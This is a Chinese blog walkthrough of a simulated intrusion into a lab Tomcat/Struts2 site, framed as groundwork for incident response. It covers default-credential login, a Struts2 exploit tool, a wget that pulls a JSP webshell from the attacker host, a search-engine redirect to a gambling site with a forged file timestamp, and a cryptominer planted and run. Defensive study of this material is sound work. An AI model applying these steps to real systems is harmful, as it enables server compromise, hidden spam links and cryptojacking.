渗透模拟笔记(含靶场)——篡改页面写暗链、留Wa Kuang程序
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
一、环境搭建
访问目标网站,一般都会有个首页如下图所示
靶场环境、使用的工具、bingdu样本,放在了 知识星球 与 我的资源 中,整理资源不易,请理解。
二、模拟攻击
2.1 渗透进网站getshell
第一步:
访问目标网站,发现是8080端口,接下来测试网站的脚本语言
输入index.html、index.php页面报错,index.jsp页面正常,说明网站是由JAVA语言编写,
第二步:
使用御剑扫描(字典最好自己整理,添加一些常见漏洞的URL)
通过扫描结果我们可以看出网站存有struts2框架,并且可以猜测出目标网站是tomcat搭建的,那么我们可以从两个思路出发:
1、测试网站是否存在tomcat弱口令漏洞
2、测试网站是否存在struts漏洞
思路一
访问tomcat默认后台路径 http://XXX:8080/manager/html
输入tomcat默认账号密码 tomcat/tomcat后,成功登录进网站
登录进后台后,可以通过部署war包的形式getshell (此处不演示了)
部署war包geshell,参考教程https://blog.csdn.net/weixin_40412037/article/details/106261564
思路二
使用struts2 漏洞检查利用工具
执行whoami命令查看是root权限
接下来让目标系统去下载webshell
wget http://192.168.184.1/config.jsp
使用命令
find / -name ROOT
找到网站根路径:/opt/tomcat9/webapps/ROOT
之后将config.jsp文件移动到ROOT目录(tomcat默认存放网站的目录)
mv config.jsp /opt/tomcat9/webapps/ROOT/config.jsp
之后再次访问wenshell,成功解析
使用菜刀连接 http://192.168.184.142:8080/config.jsp
2.2 篡改页面,植入暗链
首先记录下网站首页index.jsp的时间,之后将文件下载下来,进行修改
修改index.jsp,在里面加入如下图所示代码
代码的含义:如果通过百度、搜搜、谷歌、搜狗等浏览器访问该网站的话,就自动跳转到 https://www.XXXXXXXX.com 博彩网站
将修改后的index.jsp上传到网站根目录
上传成功后发现时间被修改了,那么我们就修改时间为原来未被篡改的时间
右键,修改时间
2.3 植入挖矿bingdu
使用菜刀上传挖矿bingdu文件update.zip
使用菜刀自带的虚拟终端执行命令,解压update.zip文件,命令:unzip update.zip
解压后运行该文件,命令:./update.sh
那么可以使用struts2漏洞利用工具,运行该文件,命令:./opt/tomcat9/webapps/ROOT/update.sh,过一会儿后,提示执行完成!
之后在进入菜刀的命令执行终端,执行:netstat -anpt 命令,查看服务器的网络连接,如果如下图所示的话,说明bingdu母体成功运行,并且下载了bingdu文件,正在进行挖矿
此时,我们可以去受害者服务器上执行top命令,可以看到挖矿程序正在运行,CPU消耗非常高
渗透模拟笔记(含靶场)——篡改页面写暗链、留Wa Kuang程序相关推荐
- 小白渗透0-1:BlackMarket靶场渗透记录
小白渗透0-1:BlackMarket靶场渗透记录 #环境 攻击机:kali 192.168.200.129 靶 机:BlackMarket 链接:https://pan.baidu.com/s/1S ...
- 百度笔记聚合优化排名:如何写出小红书爆款文案
5000字长文警告:如果你的小红书收入,每月能上万,这篇回答可以不用看了! 达不到的,送你一份服装小红书引流变现模板:6种爆款标题,3大种草笔记模板,7种封面排版形式,8大问题答疑...... 手把手 ...
- PHP学习笔记-PHP与Web页面的交互2
转载请标明出处: http://blog.csdn.net/hai_qing_xu_kong/article/details/51761308 本文出自:[顾林海的博客] 前言 在<PHP学习笔 ...
- layui 子页面写弹出框覆盖父页面,以及给弹框中的表单赋值
咋说呢,因为对 layui 不太熟悉,这个弹出框搞了好久,看了好多解决方案,大致尝试了一下其中几种,在坑中无法自拔...总之终于搞出来了,在这里分享一下我的笔记. 着急的直接 戳这里 看解决代码. 尝 ...
- 计算机图形学在线考试题,图形学模拟试题含答案.doc
<图形学模拟试题含答案.doc>由会员分享,可在线阅读,更多相关<图形学模拟试题含答案.doc(9页珍藏版)>请在装配图网上搜索. 1.计算机图形学课程模拟试卷 (参考答案含评 ...
- 计算机教师考调试题及答案,小学数学教师选调进城考试模拟试卷(含答案)-
<小学数学教师选调进城考试模拟试卷(含答案)->由会员分享,可在线阅读,更多相关<小学数学教师选调进城考试模拟试卷(含答案)-(5页珍藏版)>请在装配图网上搜索. 1.小学数学 ...
- Android viewPager2 + fragment 模拟微信首页2(滑动页面标签同步变化,点击标签滑动页面)
可以实现的方式:BottomNavigationView 这里我们不使用BottomNavigationView,手动来写代码 先看一下效果 fragment + viewPager2模拟微信首页2( ...
- 云南林业职业技术学院计算机考试试题,云南林业职业技术学院单招模拟题(含解析)9.docx...
云南林业职业技术学院单招模拟题(含解析)9 育龙单招网,单招也能上大学! 2016年云南单招 云南林业职业技术学院 考试模拟题(含解析) 本云南云南林业职业技术学院单招考试模拟题,内容来自于相关网站和 ...
- IDEA在jsp页面写out.print()代码报错
如题,小编以前用myeclipse,eclipse的时候,在jsp里写java代码都是可以的,现在我换成了IDEA,却莫名报错 而且没有代码提示,比如说下图这样的,,虽然运行还是能运行...但对强迫症 ...
最新文章
- 一个apk多个ICON执行入口
- 【转】HTTP Response Header 的 Content-Disposition
- 相邻记录日期差 oracle,sql 相邻2条记录时间差比较
- hdu 4160 Dolls 匈牙利算法求最大匹配
- VTK修炼之道82:VTK管线机制_信息对象类VTKInformation
- HDU - 2594 Simpsons’ Hidden Talents(KMP的next数组)
- java xfire webservice 异步_[Java教程]Java中使用webservice,简化开发(xfire的webservice)...
- P2617-Dynamic Rankings【树套树】
- java代码审计ssrf危险函数_某租车系统Java代码审计之后台注入漏洞分析
- java编写统计玩家总数的程序_JAVA程序:输出一组数后如何统计特定数的总数
- nosetest忽略执行指定文件方法
- java编程语言视频教程,详细说明
- iOS开发,第三方应用微信授权登录,获取微信unionid
- 计算机三级网络技术-----DHCP报文分析
- 证件照修改宽高和体积的工具
- java调用python实现校验一串字符串是否为单词
- Web前端学习笔记07:CSS_高级技巧_定位
- PLC按时间启停设备运转,设备到期停止设备运转
- DP4809国产双通道耳机音频功率放大器芯片兼容替代LM4809
- 象棋棋谱xqf工具包 v2.02 绿色